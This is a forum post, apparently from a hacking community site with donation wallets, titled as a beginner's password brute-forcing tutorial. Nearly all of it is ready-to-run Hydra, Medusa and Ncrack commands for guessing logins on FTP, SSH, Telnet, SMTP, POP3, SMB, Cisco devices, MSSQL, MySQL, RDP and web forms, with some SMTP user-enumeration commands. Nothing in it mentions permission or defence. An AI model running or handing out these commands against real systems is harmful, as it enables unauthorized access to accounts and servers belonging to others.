Jump to content

Support Jabber

[email protected]

Donate Wallets

Bitcoin

3312mhuXCQm8dadLjAjatTptAynoVXpHSg

XMR

894nrpwSyqqVixB2rThRF49PuUwoocaeK6RBA1AsmqPw55eWT1wFmF8R3zsWJC5hDZ1XrTwdzHnTTPKF3zSqLDNNBp3nJmk

Perfect Money

Euro E33184153Β | USDΒ U36405241

Sign in to follow this  
Jester

Beginner bruteforcing tutorial

Recommended Posts

Hidden Content
    π—₯π—˜π—€π—¨π—œπ—₯π—˜π— π—˜π—‘π—§π—¦:
    - Wordlist (https://github.com/danielmiessler/SecLists)
    - Username(or userlist /usr/share/wordlist)
    - Kali Linux or Termux (Google For Termux For Tools Installation!)
    - Working Internet

    FTP Bruteforce

    1. Hydra
    $ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out

    $ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out

    $ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out

    $ hydra -l root -P 500-worst-passwords.txt <ip> ftp

    For the parameters please type hydra -h !

    2. Medusa
    $ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp

    $ medusa -M ftp -h <ip> -u username -p password


    SSH

    1. Medusa
    $ medusa -h <target> -P /root/pasword.txt -u root -M ssh

    2. NCrack
    $ ncrack -p ssh -u root --pass 'root'
    <target>

    3. Hydra
    $ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out

    $ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out

    $ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out

    Telnet

    1. Hydra
    $ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out

    $ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out

    2. Medusa
    $ medusa -h <ip> -M telnet -U user.txt -P password.txt

    SMTP

    1. Medusa
    $ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password

    $ medusa -M smtp -m EHLO:world -U accounts.txt -p password

    SMTP VRFY

    1. Medusa
    $ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com

    2. Smtp-User-Enum
    $ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>
    Β 
    SMTP RCPT TO

    1. Medusa
    medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com

    HTTP

    1. Hydra
    $ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get
    Β 
    HTTPS

    1. Hydra
    $ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get
    Β 
    POP3

    1. Medusa
    $ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password

    $ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password

    2. Hydra
    $ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out

    $ hydra -S -l <[email protected]> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out

    SMB

    1. Hydra
    $ hydraΒ  -vΒ  -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out

    $ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out

    2. Medusa
    $ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out

    Cisco πŸ–²
    1. Hydra
    $ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out

    $ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out

    MSSQL

    1. Hydra
    $ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out

    $ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql

    $ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar

    MySQL

    1. Hydra
    $ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

    $ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out

    RDP

    1. Hydra
    $ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good

    2. Medusa
    $ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp

    3. NCrack
    $ ncrack -p rdp -u administrator --pass 'password' -iL in2

    $ ncrack -vv --user offsec -P password-file.txt rdp://<ip>

    WebForm
    1. Hydra
    $ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

    $ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×